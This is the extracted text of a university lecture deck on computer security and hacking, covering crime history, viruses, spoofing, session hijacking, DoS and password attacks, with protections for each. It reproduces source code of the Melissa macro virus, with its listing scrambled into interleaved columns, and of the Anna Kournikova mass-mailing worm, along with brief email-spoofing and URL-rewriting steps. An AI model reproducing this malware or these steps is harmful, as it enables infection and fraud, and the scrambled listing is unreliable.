Hacking PowerPoint - University at Albany
advertisement
Computer Security GSBA (Zurich): MIS Block Hacking Topics • • • • Crisis Computer Crimes Hacker Attacks Modes of Computer Security – – – – – Password Security Network Security Web Security Distributed Systems Security Database Security Sanjay Goel, School of Business, University at Albany 2 Crisis • • • • • Internet has grown very fast and security has lagged behind. Legions of hackers have emerged as impedance to entering the hackers club is low. It is hard to trace the perpetrator of cyber attacks since the real identities are camouflaged It is very hard to track down people because of the ubiquity of the network. Large scale failures of internet can have a catastrophic impact on the economy which relies heavily on electronic transactions Sanjay Goel, School of Business, University at Albany 3 Computer Crime – The Beginning • In 1988 a "worm program" written by a college student shut down about 10 percent of computers connected to the Internet. This was the beginning of the era of cyber attacks. • Today we have about 10,000 incidents of cyber attacks which are reported and the number is growing. Sanjay Goel, School of Business, University at Albany 4 Computer Crime - 1994 • A 16-year-old music student called Richard Pryce, better known by the hacker alias Datastream Cowboy, is arrested and charged with breaking into hundreds of computers including those at the Griffiths Air Force base, Nasa and the Korean Atomic Research Institute. His online mentor, "Kuji", is never found. • Also this year, a group directed by Russian hackers broke into the computers of Citibank and transferred more than $10 million from customers' accounts. Eventually, Citibank recovered all but $400,000 of the pilfered money. Sanjay Goel, School of Business, University at Albany 5 Computer Crime - 1995 • • • In February, Kevin Mitnick is arrested for a second time. He is charged with stealing 20,000 credit card numbers. He eventually spends four years in jail and on his release his parole conditions demand that he avoid contact with computers and mobile phones. On November 15, Christopher Pile becomes the first person to be jailed for writing and distributing a computer virus. Mr Pile, who called himself the Black Baron, was sentenced to 18 months in jail. The US General Accounting Office reveals that US Defense Department computers sustained 250,000 attacks in 1995. Sanjay Goel, School of Business, University at Albany 6 Computer Crime - 1999 • In March, the Melissa virus goes on the rampage and wreaks havoc with computers worldwide. After a short investigation, the FBI tracks down and arrests the writer of the virus, a 29-year-old New Jersey computer programmer, David L. Smith. • More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999 Sanjay Goel, School of Business, University at Albany 7 Computer Crime - 2000 • • • In February, some of the most popular websites in the world such as Amazon and Yahoo are almost overwhelmed by being flooded with bogus requests for data. In May, the ILOVEYOU virus is unleashed and clogs computers worldwide. Over the coming months, variants of the virus are released that manage to catch out companies that didn't do enough to protect themselves. In October, Microsoft admits that its corporate network has been hacked and source code for future Windows products has been seen. Sanjay Goel, School of Business, University at Albany 8 Computer Crime - 2002 • In April 2002, computer hackers calling themselves “Deceptive Duo” announced that they had begun their mission of breaking into computer systems to call attention to the vulnerabilities in the US National Security – In subsequent weeks they hacked into 52 web sites and databases including those operated by the US office of secretary of defense, the space and Naval Warfare Systems Command, The Defense Logistics Agency, Sandia National Lab, NASA JPL, Airlines, Banks … Sanjay Goel, School of Business, University at Albany 9 Intrusion Incident Reports Intrusion incident reports compiled by CERT (Source http://www.cert.org/stats) 120000 Incident Reports 100000 80000 60000 40000 20000 0 1986 1988 1990 1992 1994 1996 1998 2000 2002 2004 Year Year Incidents 1988 6 1989 132 1990 252 1991 406 1992 773 1993 1,334 1994 2,340 1995 2,412 1996 2,573 1997 2,134 1998 3,734 1999 9,859 2000 21,756 2001 52,658 2002 100,000 Note: Projected from 3 quarters of data Sanjay Goel, School of Business, University at Albany 10 Why are we vulnerable? • Increased complexity of the systems – – • Constantly upgrading computer systems and software – – • Support staff not able to keep up with security provisions New technology (often not fully tested) adds new risk Lack of proper education – • Large networks with switches, hubs, gateways provide multiple entry points Very sophisticated software using millions of lines of code which leave holes for hackers to attack Managers do not realize the vulnerabilities and are not willing to invest in technology that does not directly effect the bottom line Dependence on commercial software with known vulnerabilities – e.g. Microsoft Windows OS and Outlook Sanjay Goel, School of Business, University at Albany 11 VIRUSES Sanjay Goel, School of Business, University at Albany 12 Virus • • Computer viruses are self-replicating software entities that attach themselves parasitically to existing programs. The virus spreads by creating replica of itself and attaching itself to other executable programs to which it has write access. – • A true virus does not spread from machine to machine on its own. It must be passed on to other users via e-mail, infected files/diskettes, programs or shared files The viruses normally consist of two parts – – Replicator: responsible for copying the virus to other executable programs. Payload: Action of the virus,which may be benign such as printing a weird message, playing music or malicious such as destroying data or corrupting the hard disk. Sanjay Goel, School of Business, University at Albany 13 Virus • • • When a user executes an infected program (an executable file or boot sector), the viral portion of the code typically executes first and then the control returns to the original program, which executes normally. Unless the virus executes a payload which the user observes the user is not likely to find the virus operating on his/her hard drive. Viruses can persist in your programs for a long time without being detected thus constantly upgrading your virus signatures and running virus scans is very important. Sanjay Goel, School of Business, University at Albany 14 Virus • Polymorphic viruses – Viruses which modify themselves prior to attaching themselves to another program. – These are hard to detect since they are constantly changing their signature. • Macro Viruses – These viruses use an application macro language (such as VB or VBScript) to create programs that infect documents and templates – If an infected document is opened the virus is executed and it infects the users application templates Sanjay Goel, School of Business, University at Albany 15 Melissa Virus System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) // Melissa Virus Source Code Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines Private Sub Document_Open() ADCL = ADI1.CodeModule.CountOfLines On Error Resume Next BGN = 2 If System.PrivateProfileString("", If ADI1.Name <> "Melissa" Then "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" If ADCL > 0 Then _ Then ADI1.CodeModule.DeleteLines 1, ADCL CommandBars("Macro").Controls("Security...").Enabled = False Set ToInfect = ADI1 System.PrivateProfileString("", ADI1.Name = "Melissa" "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& DoAD = True Else End If CommandBars("Tools").Controls("Macro").Enabled = False If NTI1.Name <> "Melissa" Then Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): If NTCL > 0 Then _ Options.SaveNormalPrompt = (1 - 1) NTI1.CodeModule.DeleteLines 1, NTCL End If Set ToInfect = NTI1 Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice NTI1.Name = "Melissa" Set UngaDasOutlook = CreateObject("Outlook.Application") DoNT = True Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") End If If System.PrivateProfileString("", If DoNT <> True And DoAD <> True Then GoTo CYA "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" If DoNT = True Then Then Do While ADI1.CodeModule.Lines(1, 1) = "" If UngaDasOutlook = "Outlook" Then ADI1.CodeModule.DeleteLines 1 DasMapiName.Logon "profile", "password" Loop For y = 1 To DasMapiName.AddressLists.Count ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Set AddyBook = DasMapiName.AddressLists(y) Do While ADI1.CodeModule.Lines(BGN, 1) <> "" x=1 ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) BGN = BGN + 1 For oo = 1 To AddyBook.AddressEntries.Count Loop Peep = AddyBook.AddressEntries(x) End If BreakUmOffASlice.Recipients.Add Peep If DoAD = True Then x=x+1 Do While NTI1.CodeModule.Lines(1, 1) = "" If x > 50 Then oo = AddyBook.AddressEntries.Count NTI1.CodeModule.DeleteLines 1 Next oo Loop BreakUmOffASlice.Subject = "Important Message From " & ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Application.UserName Do While NTI1.CodeModule.Lines(BGN, 1) <> "" BreakUmOffASlice.Body = "Here is that document you asked for ... don't ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) show anyone else ;-)" BGN = BGN + 1 BreakUmOffASlice.Attachments.Add ActiveDocument.FullName Loop BreakUmOffASlice.Send End If Peep = "" CYA: Next y If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = DasMapiName.Logoff False) Then End If ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True: End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Subat Albany Sanjay Goel, School of Business, University 16 Worms • Worms are a form of self-replicating programs that can automatically spread. – – • ILOVEYOU worm in 2000 automatically emailed itself to the first 200 entries in the outlook address book – – • The worm spread to 10 million computers in two days which were required to create a patch for it It cost billions of dollars to repair the damage Sometimes worms take a long time to spread – • Unlike the viruses they do not need a carrier program and they replicate by spawning copies of themselves. They are more complex and are much harder to write than the virus programs. Anna Kournikova worm was discovered in August 2000 and became a serious threat in February 2001 CodeRed, Nimbda, SirCam are other worms each of which cost upwards of 500 million dollars in damages Sanjay Goel, School of Business, University at Albany 17 Worm (Anna Kournikova) 'Vbs.OnTheFly Created By OnTheFly On Error Resume Next Set WScriptShell = CreateObject("WScript.Shell") WScriptShell.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b" Set FileSystemObject = Createobject("scripting.filesystemobject") FileSystemObject.copyfile wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) & " \AnnaKournikova.jpg.vbs" if WScriptShell.regread ("HKCU\software\OnTheFly\mailed") <> "1" then doMail() end if if month(now) = 1 and day(now) = 26 then WScriptShell.run "Http://www.dynabyte.nl",3,false end if Set thisScript = FileSystemObject.opentextfile(wscript.scriptfullname, 1) thisScriptText = thisScript.readall thisScript.Close Do If Not (FileSystemObject.fileexists(wscript.scriptfullname)) Then Set newFile = FileSystemObject.createtextfile(wscript.scriptfullname, True) newFile.write thisScriptText newFile.Close End If Loop Function doMail() On Error Resume Next Set OutlookApp = CreateObject("Outlook.Application") If OutlookApp = "Outlook" Then Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI") Set AddressLists = MAPINameSpace.AddressLists For Each address In AddressLists If address.AddressEntries.Count <> 0 Then entryCount = address.AddressEntries.Count For i = 1 To entryCount Set newItem = OutlookApp.CreateItem(0) Set currentAddress = address.AddressEntries(i) newItem.To = currentAddress.Address newItem.Subject = "Here you have, ;o)" newItem.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & "" set attachments = newItem.Attachments attachments.Add FileSystemObject.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs" newItem.DeleteAfterSubmit = True If newItem.To <> "" Then newItem.Send WScriptShell.regwrite "HKCU\software\OnTheFly\mailed", "1" End If Next End If Sanjay Goel, School of Business, University at Albany Next end if End Function 18 Trojan Horse • • This is a program that secretly gets installed on a computer planting a secret payload that can allow a hacker who planted it access to do things such as stealing passwords or recording key strokes and transmitting them to a third party A logic bomb is a trojan horse that executes when certain conditions become true – • Most commonly executes at a specific date and time Example: Cute Trojan Horse allows hackers to destroy the firewalls installed on computers. Sanjay Goel, School of Business, University at Albany 19 HACKERS Sanjay Goel, School of Business, University at Albany 20 Why do Hackers Attack? • • Most hackers try to test the system limitations out of intellectual curiosity & bragging rights Cyber criminals hack into corporate computers to steal money or credit card numbers – • Cyber terrorists try to push their political agenda by coercion via computer-based attacks against computers and networks – – • In March 2001 FBI reported that over 1 million credit card numbers were stolen by cyber criminals in Russia & Ukraine NATO computers were blasted with infected emails to protest against bombings in Kosovo during the 1999 conflict Lucent was made target for DOS attacks by a group protesting against its business with Israel Disgruntled employees often venting anger at a company or organization by hacking & stealing information or causing damage to computer systems Sanjay Goel, School of Business, University at Albany 21 Types of Hacker Attack • Active Attacks – – Denial of Service Breaking into a site • Intelligence Gathering • Resource Usage • Deception • Passive Attacks – Sniffing • Passwords • Network Traffic • Sensitive Information – Information Gathering Sanjay Goel, School of Business, University at Albany 22 Modes of Hacker Attack • • • • • Spoofing Session Hijacking Denial of Service Attacks Buffer Overflow Attacks Password Attacks Sanjay Goel, School of Business, University at Albany 23 Spoofing Definition: An attacker alters his identity so that some one thinks he is some one else – Email, User ID, IP Address, … – Attacker exploits trust relation between user and networked machines to gain access to machines Types of Spoofing: 1. IP Spoofing: 2. Email Spoofing 3. Web Spoofing Sanjay Goel, School of Business, University at Albany 24 IP Spoofing • There are three basic flavors of IP spoofing attacks – – – Basic Address Change Use of source routing to intercept packets Exploiting of a trust relationship on UNIX machines Sanjay Goel, School of Business, University at Albany 25 IP Spoofing – Basic Address Change Definition: Attacker uses IP address of another computer to acquire information or gain access Replies sent back to 10.10.20.30 Spoofed Address 10.10.20.30 • • • John 10.10.5.5 Attacker changes his own IP address to spoofed address Attacker can send messages to a machine masquerading as spoofed machine Attacker can not receive messages from that machine From Address: 10.10.20.30 To Address: 10.10.5.5 Attacker 10.10.50.50 Sanjay Goel, School of Business, University at Albany 26 Basic Address Change (Windows) • Simple Mechanism – – – – – – – From start menu select settings Control Panel Double click on the network icon Right click the LAN connection and select properties select Internet Protocol (TCP/IP) and click on properties Change the IP address to the address you want to spoof Reboot the machine All packets sent from the machine have the spoofed address Sanjay Goel, School of Business, University at Albany 27 Basic Address Change (Unix) • Use ifconfig command – Write Details Sanjay Goel, School of Business, University at Albany 28 IP-Spoofing (Basic Address Change) • Limitation – – – Flying Blind Attack i.e. user can not get return messages Any protocol which requires 3-way connection can not be used UDP which is connectionless can be used to send packets • Uses – Used in denial-of-service attack where a single packet can crash a machine Sanjay Goel, School of Business, University at Albany 29 IP Spoofing – Basic Address Change • Prevention – – • • You can protect your machines from being used to launch a spoofing attack You can do little to prevent other people from spoofing your address Users can be prevented from having access to network configuration To protect your company from spoofing attack you can apply basic filters at your routers – – Ingress Filtering: Prevent packets from outside coming in with address from inside. Egress Filtering: Prevents packets not having an internal address from leaving the network Sanjay Goel, School of Business, University at Albany 30 IP Spoofing – Source Routing Definition: Attacker spoofs the address of another machine and inserts itself between the attacked machine and the spoofed machine to intercept replies Attacker intercepts packets as they go to 10.10.20.30 From Address: 10.10.20.30 To Address: 10.10.5.5 Replies sent back to 10.10.20.30 Spoofed Address 10.10.20.30 • Attacker 10.10.50.50 John 10.10.5.5 The path a packet may change can vary over time Sanjay Goel, School of Business, University at Albany 31 IP Spoofing – Source Routing Contd. • Attacker uses source routing to ensure that the packets pass through certain nodes on the network – Loose Source Routing (LSR): The sender specifies a list of addresses that the packet must go through but it can go to any other address if it needs to. – Strict Source Routing (SSR): The sender specifies the exact path for the packet and the packet is dropped if the exact path can not be taken. • Source Routing works by using a 39-byte source route option field in the IP header – – • Works by picking one node address at a time sequentially A maximum of 9 nodes in the path can be specified Source Routing was introduced into the TCP spec for debugging and testing redundancy in the network Sanjay Goel, School of Business, University at Albany 32 • • • IP Spoofing – Source Routing contd. Tracert: Windows NT utility runs at a Command prompt. Traces a path from your machine to the URL or IP address given along with the tracert command. Usage: – – tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name Options: • • • • • -d -h maximum_hops -j host-list -w timeout Do not resolve addresses to hostnames. Maximum number of hops to search for target. Loose source route along host-list. Wait timeout milliseconds for each reply. Tracing a URL: tracert www.techadvice.com <enter> – Tracing route to www.techadvice.com [63.69.55.237] over a maximum of 30 hops: 1 181 ms 160 ms 170 ms border0.Srvf.Rx2.abc [63.69.55.237] 2 170 ms 170 ms 160 ms 192.168.0.2 3 ..... Sanjay Goel, School of Business, University at Albany 33 • • • IP Spoofing – Source Routing contd. Tracing an IP-Address: tracert 3.1.6.62 Tracing using loose source routing: tracert –j 3.2.1.44 3.3.1.42 Protection – Disable source routing at your routers Sanjay Goel, School of Business, University at Albany 34 IP Spoofing – Trust Relationships • In UNIX trust relationships can be set up between multiple machines – – • Trust relationship is easy to spoof – – • After trust becomes established the user can use Unix r commands to access sources on different machines A .rhosts file is set up on individual machines or /etc/hosts.equiv is used to set it up at the system level If user realizes that a machine trusts the IP address 10.10.10.5 he can spoof that address and he is allowed access without password The responses go back to the spoofed machine so this is still a flying blind attack. Protection – – – Do not use trust relations Do not allow trust relationships on the internet and limit them within the company Monitor which machines and users can have trust without jeopardizing critical data or function Sanjay Goel, School of Business, University at Albany 35 Email Spoofing Definition: Attacker sends messages masquerading as some one else What can be the repercussions? Reasons: • Attackers want to hide their identity while sending messages (sending anonymous emails) – • Attacker wants to impersonate someone – • User sends email to anonymous e-mailer which sends emails to the intended recipient To get someone in trouble Social engineering – Get information by pretending to be someone else Sanjay Goel, School of Business, University at Albany 36 Email Spoofing – Similar Name Account • Create an account with similar email address – – SanjayGoel@yahoo.com: A message from this account can perplex the students Most mailers have an alias field (this can be used to prescribe any name. • Example Class: I am too sick to come to the class tomorrow so the class is cancelled. The assignments that were due are now due next week. Sanjay Goel Sanjay Goel, School of Business, University at Albany 37 Email Spoofing – Similar Name • Protection – – – – Account Educating the employees in a corporation to be cautious Make sure that the full email address rather than alias is displayed Institute policy that all official communication be done using company email Use PKI where digital signature of each employee is associated with the email Sanjay Goel, School of Business, University at Albany 38 Email Spoofing – Mail Client • Modify a mail client – – When email is sent from the user no authentication is performed on the from address Attacker can put in any return address he wants to in the mail he sends • Protection – – – Education Audit Logging Looking at the full email address Sanjay Goel, School of Business, University at Albany 39 Email Spoofing – Telnet to Port 25 • Telnet to port 25 – – – – • Most mail servers use port 25 for SMTP. An attacker runs a port scan and gets the IP address of machine with port 25 open telnet ip-adress 25 (cmd to telnet to port 25) Attacker logs on to this port and composes a message for the user. Example: Hello mail from:spoofed-email-address Rcpt to: person-sending-mail-to Data (message you want to send) Period sign at the end of the message Sanjay Goel, School of Business, University at Albany 40 Email Spoofing – Telnet to Port 25 • Mail relaying is the sending of email to a person on a different domain • Protection – – – – Make sure that the recipients domain is the same as the the mail server New SMTP servers disallow mail relaying From a remote connection the from and to addresses are from the same domain as the mail server Make sure that spoofing and relay filters are configured Sanjay Goel, School of Business, University at Albany 41 Web Spoofing • • • • Basic Man-in-the-Middle Attack URL Rewriting Tracking State Sanjay Goel, School of Business, University at Albany 42 Web Spoofing - Basic • No requirement against registering a domain – • Attacker registers a web address matching an entity e.g. votebush.com, geproducts.com, gesucks.com Process – – – – – – – – Hacker sets up a spoofed site User goes to the spoofed site Clicks on items to order and checks out Site prompts user for credit card information Gives the user a cookie Puts message – Site experiencing technical difficulty When user tries back spoofed site checks cookie Already has credit card number so directs the user to legitimate site Sanjay Goel, School of Business, University at Albany 43 Web Spoofing - Basic • Protection – – – Use server side certificates Certificates much harder to spoof Users need to ensure that the certificates are legitimate before clicking on OK to accept certificate Sanjay Goel, School of Business, University at Albany 44 Web Spoofing – Man in the Middle Attack • Man-in-the-Middle Attack – – • Attacker acts as a proxy between the web server and the client Attacker has to compromise the router or a node through which the relevant traffic flows Protection – Secure the perimeter to prevent compromise of routers Sanjay Goel, School of Business, University at Albany 45 Web Spoofing – URL Rewriting • URL Rewriting – – • Attacker redirects web traffic to another site that is controlled by the attacker Attacker writes his own web site address before the legitimate link – e.g. <A href=“http://www.hacker.com/http://www.albany.edu/index.html”> – The user is first directed to the hacker site and then redirected to the actual site Protections – – Web browsers should be configured to always show complete address Ensure that the code for the web sites is properly protected at the server end and during transit Sanjay Goel, School of Business, University at Albany 46 Web Spoofing • Tracking State – – When a user logs on to a site a persistent authentication is maintained This authentication can be stolen for masquerading as the user Sanjay Goel, School of Business, University at Albany 47 Tracking State • Browsers primarily use Http protocol to communicate – – – Http is a stateless protocol Web Sites need to maintain persistent authentication so that user does not have to authenticate repeatedly This authentication can be stolen for masquerading as the user Request Response Browser Web Server Sanjay Goel, School of Business, University at Albany Database 48 Web Spoofing – Tracking State • Three types of tracking methods are used: 1. Cookies: Line of text with ID on the users cookie file – Attacker can read the ID from users cookie file 2. URL Session Tracking: An id is appended to all the links in the website web pages. – Attacker can guess or read this id and masquerade as user 3. Hidden Form Elements – – ID is hidden in form elements which are not visible to user Hacker can modify these to masquerade as another user 49 Sanjay Goel, School of Business, University at Albany Web Spoofing – Tracking State Cookies • Cookies are a piece of information that the server passes to the browser and the browser stores on the server – • • Web servers place cookies on user machines with id to track the users Two types of cookies – – • Set of name value pairs Persistent cookies: Stored on hard drive in text format Non-persistent cookies: Stored in memory and goes away after you reboot or turn off the machine Attacker gets cookies by: – – Accessing the victim hard drive Guessing Ids which different web servers assign Sanjay Goel, School of Business, University at Albany 50 Web Spoofing – Tracking State Cookies • Protection – – – Physical protection of hard drives is best protection Use non-persistent cookies since hacker has to access and edit memory to get to it. Use random, hard to guess ID Sanjay Goel, School of Business, University at Albany 51 Web Spoofing – Tracking State URL Encoding • http:// www.address.edu:1234/path/subdir/file.ext?query_string – – – – – • Http allows name value pairs to be passed to the resource – • http:// www. test. edu/index.jsp?firstname=sanjay+lastname=goel The server can place the id of a customer along with the URL – • Service http Host www. Address. edu Port 1234 /path/subdur/file.ext resource path on the server query_string additional information that can be passed to resource http://www.fake.com/ordering/id=928932888329938.823948 This number can be obtained by guessing or looking over some one’s shoulder – – Timeout for the sessions may be a few hours User can masquerade as the owner of the id and transact on the web Sanjay Goel, School of Business, University at Albany 52 Web Spoofing – URL Encoding Protection • Server Side – – • User Side – – • Use large, hard to guess identifiers Keep the session inactivity time low Make sure that no one is looking over your shoulder as you browse Do not leave terminals unattended Use server side certificates – – A server side certificate is a certificate that the server presents to a client to prove identity Users should verify the certificates prior to clicking OK on the accept button Sanjay Goel, School of Business, University at Albany 53 Web Spoofing – Tracking State Cookies • • • HTML allows creation of hidden fields in the forms Developers exploit this to store information for their reference ID can be stored as a hidden form field – – • <Input Type=Hidden Name=“Search” Value=“key”> <Input Type=Hidden Name=“id” Value=“123429823”> Protection – – Hard to guess ids Short expiry times Sanjay Goel, School of Business, University at Albany 54 Web Spoofing – General Protection • • • Disable JavaScript, ActiveX and other scripting languages that execute locally or in the browser Make sure that the browsers location line is always visible Educate the users Make hard to guess session ids • Use server side certificates • – – A server side certificate is a certificate that the server presents to a client to prove identity Users should verify the certificates prior to clicking OK on the accept button Sanjay Goel, School of Business, University at Albany 55 Session Hijacking Definition: Process of taking over an existing active session Modus Operandi: 1. User makes a connection to the server by authenticating using his user ID and password. 2. After the users authenticate, they have access to the server as long as the session lasts. 3. Hacker takes the user offline by denial of service 4. Hacker gains access to the user by impersonating the user Sanjay Goel, School of Business, University at Albany 56 Session Hijacking Bob telnets to Server Bob authenticates to Server Server Bob Die! Hi! I am Bob Attacker • Attacker can – – – monitor the session periodically inject commands into session launch passive and attacks the session Sanjayactive Goel, School of Business, University at from Albany 57 Session Hijacking – How Does it Work? • • Attackers exploit sequence numbers to hijack sessions Sequence numbers are 32-bit counters used to: – – • • Receiver and Sender have their own sequence numbers When two parties communicate the following are needed: – – – • tell receiving machines the correct order of packets Tell sender which packets are received and which are lost IP addresses Port Numbers Sequence Number IP addresses and port numbers are easily available so once the attacker gets the server to accept his guessed sequence numbers he can hijack the session. Sanjay Goel, School of Business, University at Albany 58 Session Hijacking – Programs • Juggernaut – – • Hunt – – • Can be use to listen, intercept and hijack active sessions on a network http://lin.fsid.cvut.cz/~kra/index.html TTY Watcher – – • Network sniffer that that can also be used for hijacking Get from http://packetstorm.securify.com Freeware program to monitor and hijack sessions on a single host http://www.cerias.purdue.edu IP Watcher – – Commercial session hijacking tool based on TTY Watcher http://www.engrade.com Sanjay Goel, School of Business, University at Albany 59 Session Hijacking – Protection • Use Encryption – • Use a secure protocol for sensitive work – • • • Prevents hacker from intercepting packets E.g. administering remote machines Limit incoming connections Minimize remote access Strong authentication ineffective – Since the authentication is only done at beginning of the session Sanjay Goel, School of Business, University at Albany 60 Denial of Service (DOS) Attack Definition: Attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the system so that no one else can use it. Types: 1. Crashing the system or network – 2. Exhausting the resources by flooding the system or network with information – 3. Send the victim data or packets which will cause system to crash or reboot. Since all resources are exhausted others are denied access to the resources Distributed DOS attacks are coordinated denial of service attacks involving several people and/or machines to launch attacks Sanjay Goel, School of Business, University at Albany 61 Types: 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. Denial of Service (DOS) Attack Ping of Death SSPing Land Smurf SYN Flood CPU Hog Win Nuke RPC Locator Jolt2 Bubonic Microsoft Incomplete TCP/IP Packet Vulnerability HP Openview Node Manager SNMP DOS Vulnerability Netscreen Firewall DOS Vulnerability Checkpoint Firewall DOS Vulnerability Sanjay Goel, School of Business, University at Albany 62 DOS Attack - Protection • Effective robust design – – • Bandwidth limitations – • Limits the options of the hacker Allow only necessary traffic – • Prevents attacks where machines are crashed Run the least amount of services – • Limit available band width based on protocol Keep systems patched – • Create redundant servers Distribute your servers across different ISPs Prevents hacked machines to be used as launching pads Block IP addresses – Once under attack start blocking IP-addresses at the firewall Sanjay Goel, School of Business, University at Albany 63 Buffer Overflow Attacks • This attack takes advantage of the way in which information is stored by computer programs • An attacker tries to store more information on the stack than the size of the buffer How does it work? Bottom of Memory • Buffer 2 Local Variable 2 Buffer 1 Local Variable 1 Fill Direction Bottom of Memory Return Pointer Function Call Arguments Top of Memory • Normal Stack Top of Memory Fill Direction • Buffer 2 Local Variable 2 Machine Code: execve(/bin/sh) New Pointer to Exec Code Function Call Arguments Buffer 1 Space Overwritten Return Pointer Overwritten • Sanjay Goel, School of Business, University at Albany Smashed Stack 64 Buffer Overflow Attacks • • Programs which do not have a rigorous memory check in the code, are vulnerable to this attack Simple weaknesses can be exploited – • If memory allocated for name is 50 characters, someone can break the system by sending a fictitious name of more than 50 characters Can be used for espionage, denial of service or compromising the integrity of the data Examples – – – – NetMeeting Buffer Overflow Outlook Buffer Overflow AOL Instant Messenger Buffer Overflow SQL Server 2000 Extended Stored Procedure Buffer Overflow Sanjay Goel, School of Business, University at Albany 65 Buffer Overflow Attacks Prevention • Close port or service – – • Apply vendor patch – • Once application is identified stop all requests to it Test Key Applications – • Update patches as soon as the vendor releases it Filter specific traffic at the firewall – • Remove vulnerable software Remove software no longer being used Test software for vulnerabilities Run software in the least privilege required – Limits the exploitation capacity of the hacker Sanjay Goel, School of Business, University at Albany 66 Password Attacks • • A hacker can exploit a weak passwords & uncontrolled network modems easily Steps – – Hacker gets the phone number of a company Hacker runs war dialer program • • – If original number is 555-5532 he runs all numbers in the 555-55xx range When modem answers he records the phone number of modem Hacker now needs a user id and password to enter company network • • • Companies often have default accounts e.g. temp, anonymous with no password Often the root account uses company name as the password For strong passwords password cracking techniques exist Sanjay Goel, School of Business, University at Albany 67 Password Security Client Hash Function Server Hashed Password Compare Password Hashed Password Password Salt Stored Password Allow/Deny Access • Password hashed and stored – Salt is added to randomize the password and then stored on the system • Password attacks launched to crack encrypted password Sanjay Goel, School of Business, University at Albany 68 Password Attacks - Process • • • • • • Find a valid user ID Create a list of possible passwords Rank the passwords from high probability to low Type in each password If the system allows you in – success ! If not, try again, being careful not to exceed password lockout (the number of times you can guess a wrong password before the system shuts down and won’t let you try any more) Sanjay Goel, School of Business, University at Albany 69 Password Attacks - Types • Dictionary Attack – – • Brute Force Attack – • People write passwords in different places People disclose passwords naively to others Shoulder Surfing – • Words from dictionary and their variations used in attack Social Engineering – – • Try all permutations of the letters & symbols in the alphabet Hybrid Attack – • Hacker tries all words in dictionary to crack password 70% of the people use dictionary words as passwords Hackers slyly watch over peoples shoulders to steal passwords Dumpster Diving – People dump their trash papers in garbage which may contain Goel, School of Business, University at Albany information to crackSanjay passwords 70 Conclusions • Computer Security is a continuous battle – • As computer security gets tighter hackers are getting smarter Very high stakes – Billions of dollars worth of business conducted on the internet Sanjay Goel, School of Business, University at Albany 71
